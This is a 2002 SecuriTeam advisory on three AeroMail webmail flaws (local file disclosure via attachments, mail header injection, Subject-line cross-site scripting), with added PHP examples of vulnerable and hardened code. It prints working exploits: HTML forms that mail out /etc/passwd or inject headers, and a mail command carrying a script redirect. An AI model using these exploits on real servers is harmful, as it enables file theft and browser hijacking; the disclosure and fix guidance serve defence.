[NEWS] AeroMail Multiple Vulnerabilities

From: support@securiteam.com
Date: 03/08/02


From: support@securiteam.com
To: list@securiteam.com
Date: Fri,  8 Mar 2002 11:23:12 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  AeroMail Multiple Vulnerabilities
------------------------------------------------------------------------

SUMMARY

 AeroMail <http://the.cushman.net/projects/aeromail/> is a web-based
e-mail client written entirely in PHP, using PHP's built-in IMAP functions.

DETAILS

Vulnerable systems:
AeroMail versions prior to 1.45

Immune systems:
AeroMail version 1.45

Problem #1
When sending e-mails, you can trick the attachment subsystem into sending
local files from the web server, or remote files fetched from URLs, instead
of the uploaded file it is supposed to send.

How is that possible? After PHP has handled a file upload, it sets a few
variables with information about it. One of them holds the name under
which the uploaded file has been temporarily stored. It is important to
check that this variable was really set by a file upload: it might equally
be ordinary POSTed data, in which case you end up with this problem.
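The pattern behind this, as an added example that is not AeroMail's own code. The vulnerable function reconstructs the assumption that the script read the field names the exploit below posts (attach, attach_name, attach_size, attach_type) as plain variables; with register_globals on, which was PHP's default at the time, a genuine upload of a field named "attach" sets exactly those four variables, and a plain text field of the same name sets the same $attach, so nothing tells the two apart. The hardened function beside it reads the upload only from $_FILES and uses is_uploaded_file(), which is true only for files PHP itself created for the current request. Function names are assumptions.

```php
<?php
// Added example (not AeroMail's code): upload handling behind issue 1,
// the assumed vulnerable pattern beside a hardened version.

// Vulnerable: $attach is trusted as the path of the temporary upload.
// file_get_contents() opens local paths and, with allow_url_fopen on,
// URLs as well, so a POSTed "/etc/passwd" or "http://..." is read and
// mailed out as if it were the uploaded file.
function attachment_vulnerable($attach, $attach_name, $attach_type)
{
    $data = @file_get_contents($attach);
    if ($data === false) {
        return false;
    }
    return array('name' => $attach_name, 'type' => $attach_type, 'data' => $data);
}

// Hardened: take every fact about the upload from PHP's own $_FILES record
// and ask PHP whether that path was really produced by this request's upload.
function attachment_hardened($field = 'attach')
{
    if (!isset($_FILES[$field]) || !is_array($_FILES[$field])) {
        return false; // no multipart upload was sent under that name
    }
    $f = $_FILES[$field];
    if (!isset($f['error']) || $f['error'] !== UPLOAD_ERR_OK) {
        return false;
    }
    // The check the advisory calls for: a POSTed string that merely names
    // an existing file (or a URL) fails here, a real upload passes.
    if (!is_uploaded_file($f['tmp_name'])) {
        return false;
    }
    // Size comes from PHP, not from an extra form field; the client-supplied
    // name is reduced to its last path component before it reaches a header.
    $name = basename($f['name']);
    $size = (int) $f['size'];
    $data = file_get_contents($f['tmp_name']);
    if ($data === false || strlen($data) !== $size) {
        return false;
    }
    // $f['type'] is also client-supplied; sniff the content instead.
    $type = 'application/octet-stream';
    if (function_exists('finfo_open')) {
        $finfo = finfo_open(FILEINFO_MIME_TYPE);
        $sniffed = finfo_file($finfo, $f['tmp_name']);
        finfo_close($finfo);
        if ($sniffed !== false) {
            $type = $sniffed;
        }
    }
    return array('name' => $name, 'type' => $type, 'size' => $size, 'data' => $data);
}
```

Note that is_uploaded_file() is the only part of the check PHP can make for you; taking the size, name and type from $_FILES rather than from separately posted fields is what closes the rest of the gap the exploit's attach_size and attach_name fields rely on.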

Problem #2
You can add additional headers to outgoing e-mail messages by sending some
normal data for the To, Cc or Subject field, a CRLF, and then another
header with some data. (A lot of other programs allow this too; it's not
just AeroMail.) This can be used for adding uuencoded attachments up in
the headers, with lines ending in CR instead of CRLF.
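A guard against this, as an added example that is not AeroMail's own code. It rejects any header value carrying a line break before the value is assembled into headers for mail(); the field names match the advisory's form, everything else is an assumption. The point the advisory makes about lines ending in a lone CR matters for the check: a test for the "\r\n" pair alone would miss them, so CR and LF are rejected separately.

```php
<?php
// Added example (not AeroMail's code): refusing header injection in the
// To/Cc/Subject values before they are built into outgoing mail headers.

// Any CR, LF or NUL in a single header value means a second line, i.e. an
// injected header. Checking the characters individually catches bare CR
// and bare LF, not just the CRLF pair.
function header_value_is_safe($value)
{
    return strpbrk($value, "\r\n\0") === false;
}

// Address fields: additionally require every comma-separated entry to be a
// syntactically valid mailbox, which leaves no room for a "Name: value" line.
function addresses_are_safe($value)
{
    if (!header_value_is_safe($value)) {
        return false;
    }
    foreach (explode(',', $value) as $addr) {
        $addr = trim($addr);
        if ($addr === '') {
            continue;
        }
        if (filter_var($addr, FILTER_VALIDATE_EMAIL) === false) {
            return false;
        }
    }
    return true;
}

// Extra headers for mail() are built only from values that passed the checks;
// on failure the caller gets false and must not send at all.
function build_mail_headers($cc, $subject)
{
    if (!addresses_are_safe($cc) || !header_value_is_safe($subject)) {
        return false;
    }
    $headers = "MIME-Version: 1.0\r\n";
    if (trim($cc) !== '') {
        $headers .= 'Cc: ' . trim($cc) . "\r\n";
    }
    return $headers;
}

// Constructed inputs mirroring the advisory's second exploit, with the
// expected verdict for each; the loop reports any mismatch.
$cases = array(
    "metaur@prontomail.com"                              => true,
    "ulfh@update.uu.se, metaur@prontomail.com"           => true,
    "metaur@prontomail.com\r\nX-Header-1: Here are some"  => false, // CRLF
    "metaur@prontomail.com\nX-Header-1: Here are some"    => false, // bare LF
    "metaur@prontomail.com\rX-Header-1: Here are some"    => false, // bare CR
    "metaur@prontomail.com X-Header-1: not an address"    => false, // fails syntax
);
foreach ($cases as $input => $expected) {
    $verdict = addresses_are_safe($input);
    echo ($verdict === $expected ? 'ok   ' : 'FAIL ') . json_encode($input) . "\n";
}
```

Rejecting rather than stripping is deliberate: a stripped value silently turns an attack into a malformed but deliverable message, whereas a rejection gives the user an error and leaves a clear trace in the application log.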

Problem #3
JavaScript and HTML code in a Subject header is rendered active when the
subject is displayed. This allows DoS attacks by redirecting the browser,
theft of cookies, etc.

Issues 1 and 2 require a valid user/password combination to be exploited,
while issue 3 is open to anyone.
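Rendering the subject as inert text, as an added example that is not AeroMail's own code. Because the client reads messages through PHP's IMAP functions, the raw header may still contain RFC 2047 encoded-words; the example decodes those first (with iconv_mime_decode(), falling back to the raw value if decoding fails) so that the escaping step sees the characters the browser will actually receive, then escapes with htmlspecialchars() and ENT_QUOTES so the text is harmless in element content and in attributes alike. Function names and the table layout are assumptions.

```php
<?php
// Added example (not AeroMail's code): displaying a Subject header without
// letting HTML or JavaScript inside it become active.

function decode_subject($raw_subject)
{
    // Decode "=?charset?B?...?=" words before escaping; escaping the encoded
    // form and decoding afterwards would reintroduce the raw markup.
    if (function_exists('iconv_mime_decode')) {
        $decoded = iconv_mime_decode($raw_subject, ICONV_MIME_DECODE_CONTINUE_ON_ERROR, 'UTF-8');
        if ($decoded !== false) {
            return $decoded;
        }
    }
    return $raw_subject;
}

function render_subject($raw_subject)
{
    // ENT_QUOTES turns < > & " and ' into entities, so the result is safe
    // both as element text and inside a quoted attribute such as title="".
    return htmlspecialchars(decode_subject($raw_subject), ENT_QUOTES, 'UTF-8');
}

// One row of a message list: the escaped subject is used twice, as link
// text and as a title attribute, and is safe in both positions.
function render_message_row($msgno, $raw_subject)
{
    $safe = render_subject($raw_subject);
    return '<tr><td><a href="read_message.php?msgno=' . (int) $msgno . '"'
         . ' title="' . $safe . '">' . $safe . "</a></td></tr>\n";
}

// Constructed input: the subject the advisory sends for issue 3.
$evil = '<script>self.location.href="http://www.kuro5hin.org/"</script>';
$row = render_message_row(1, $evil);
// The rendered row must not contain a raw "<script" anywhere.
echo (strpos($row, '<script') === false ? 'ok   ' : 'FAIL ') . $row;
```

The same escaping belongs on every header and body fragment that reaches the page (From, To, attachment names), not only on Subject; the advisory singles out Subject because that is where the injection was observed, and the fix is the same one-way escape at the point of output.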

Solution:
The vendor was contacted with an explanation, two exploits and a patch on
the 23rd of February. Version 1.45, which is not vulnerable to any of
these issues, was released on the 27th of February.

Exploits:
Here are HTML exploits for issues 1 and 2.

Issue 3 doesn't need a special exploit - you just send an ordinary mail:

mail -s '<script>self.location.href="http://www.kuro5hin.org/"</script>' \
metaur@prontomail.com < /dev/null

Exploit #1:
<html>
<head>
<title>AeroMail Exploit 1</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body bgcolor="#ffffff" text="#000000" link="#000000" alink="#000000"
vlink="#000000">
<h1>AeroMail Exploit 1</h1>

<form method="POST"
action="http://www.example.com/aeromail/send_message.php">
Written by <a href="mailto:metaur@prontomail.com">Ulf H&auml;rnhammar</a>
in 2002.<p>

<input type="hidden" name="return" value="INBOX" size="0">

To:<br>
<input type="text" name="to" size="50"><br>

Cc:<br>
<input type="text" name="cc" size="50"><br>

Attach (what file or URL to send):<br>
<input type="text" name="attach" size="50" value="/etc/passwd"><br>

Attach_size (in bytes, just enter something that is big enough):<br>
<input type="text" name="attach_size" size="50" value="2048"><br>

Attach_name (what the file or URL will be called in the MIME
headers):<br>
<input type="text" name="attach_name" size="50" value="passwd"><br>

Attach_type:<br>
<input type="text" name="attach_type" size="50" value=
"application/octet-stream"><br>

Subject:<br>
<input type="text" name="subject" size="50"><br>

Body:<br>
<textarea name="body" rows="5" cols="50">
</textarea><br>

<input type="submit" value="Exploit it">
</form>

</body>
</html>

Exploit #2:
<html>
<head>
<title>AeroMail Exploit 2</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body bgcolor="#ffffff" text="#000000" link="#000000" alink="#000000"
vlink="#000000">
<h1>AeroMail Exploit 2</h1>

<form method="POST"
action="http://www.example.com/aeromail/send_message.php">
Written by <a href="mailto:metaur@prontomail.com">Ulf H&auml;rnhammar</a>
in 2002.<p>

Note: Don't press ENTER after the last header in any of the textareas.<p>

<input type="hidden" name="return" value="INBOX" size="0">

To:<br>
<textarea name="to" rows="5" cols="50">
metaur@prontomail.com
X-Header-1: Here are some
X-Header-2: extra mail headers</textarea><br>

Cc:<br>
<textarea name="cc" rows="5" cols="50">
ulfh@update.uu.se
X-Header-3: Here are a few more
X-Header-4: mail headers</textarea><br>

<input type="hidden" name="attach" value="none" size="0">
<input type="hidden" name="attach_size" value="0" size="0">
<input type="hidden" name="attach_name" value="" size="0">
<input type="hidden" name="attach_type" value=
"application/octet-stream" size="0">

Subject:<br>
<textarea name="subject" rows="5" cols="50">
AeroMail Exploit 2
X-Header-5: Here are the last
X-Header-6: extra mail headers</textarea><br>

Body:<br>
<textarea name="body" rows="5" cols="50">
</textarea><br>

<input type="submit" value="Exploit it">
</form>

</body>
</html>

ADDITIONAL INFORMATION

The information has been provided by Ulf Harnhammar <ulfh@update.uu.se>.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
